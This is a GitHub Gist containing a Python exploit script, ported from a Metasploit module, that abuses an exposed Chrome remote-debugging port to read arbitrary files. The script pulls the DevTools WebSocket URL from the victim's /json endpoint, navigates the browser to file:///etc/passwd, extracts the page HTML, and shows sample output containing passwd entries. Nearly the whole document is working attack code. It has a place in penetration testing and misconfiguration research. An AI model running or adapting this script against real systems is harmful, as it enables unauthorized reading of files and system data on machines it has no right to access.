Created
March 6, 2023 11:49
-
-
Save pich4ya/5e7d3d172bb4c03360112fd270045e05 to your computer and use it in GitHub Desktop.
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
# pip install requests websocket-client python-socks | |
# This exploit code can be used to read arbitrary files on the victim machine with | |
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase | |
import requests | |
import json | |
import urllib3 | |
import websocket | |
import random | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
http_proxy = "http://127.0.0.1:8080" | |
https_proxy = "https://127.0.0.1:8080" | |
ftp_proxy = "ftp://127.0.0.1:8081" | |
proxyDict = { | |
"http" : http_proxy, | |
"https" : https_proxy, | |
"ftp" : ftp_proxy | |
} | |
burp0_url = "http://victim:9222/json" | |
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "sec-ch-ua": "\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Sec-Fetch-Site": "none", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} | |
resp = requests.get(burp0_url, headers=burp0_headers).text | |
# resp = requests.get(burp0_url, headers=burp0_headers, proxies=proxyDict, verify=False).text | |
# print(resp) | |
webSocketDebuggerUrl=json.loads(resp)[0]['webSocketDebuggerUrl'] | |
print(webSocketDebuggerUrl) | |
# generate a random integer between 1000 and 5000 | |
id = random.randint(1000, 5000) | |
# create the JSON query | |
query = { | |
"id": id, | |
"method": "Page.navigate", | |
"params": { | |
"url": "file:///etc/passwd" | |
} | |
} | |
query_json = json.dumps(query) | |
# connect to the WebSocket endpoint | |
ws = websocket.create_connection(webSocketDebuggerUrl) | |
# ws = websocket.create_connection(webSocketDebuggerUrl, http_proxy_host="127.0.0.1", http_proxy_port="1080", proxy_type="socks5") | |
# ws.connect("ws://echo.websocket.events", | |
# http_proxy_host="127.0.0.1", http_proxy_port="8080", | |
# proxy_type="http", http_proxy_auth=("username", "password123")) | |
# send the JSON query | |
ws.send(query_json) | |
# get the WebSocket response | |
response = ws.recv() | |
print(response) | |
# create the second JSON query | |
query2 = { | |
"id": id + 1, | |
"method": "Runtime.evaluate", | |
"params": { | |
"expression": "document.documentElement.outerHTML" | |
} | |
} | |
query2_json = json.dumps(query2) | |
# send the second JSON query | |
ws.send(query2_json) | |
# get the second WebSocket response | |
response2 = ws.recv() | |
print(response2) | |
# close the WebSocket connection | |
ws.close() | |
# Output: | |
# ws://victim:9222/devtools/page/3D53F4B043DE842A90FCB6A1B854B11A | |
# {"id":1121,"result":{"frameId":"3D53F4B043DE842A90FCB6A1B854B11A","loaderId":"EFD61728BF3DD2E0A2DEB05FF083FE3C"}} | |
# {"id":1122,"result":{"result":{"type":"string","value":"<html><head><meta name=\"color-scheme\" content=\"light dark\"></head><body><pre style=\"word-wrap: break-word; white-space: pre-wrap;\">root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/[...]/bin/false\n</pre></body></html>"}}} | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment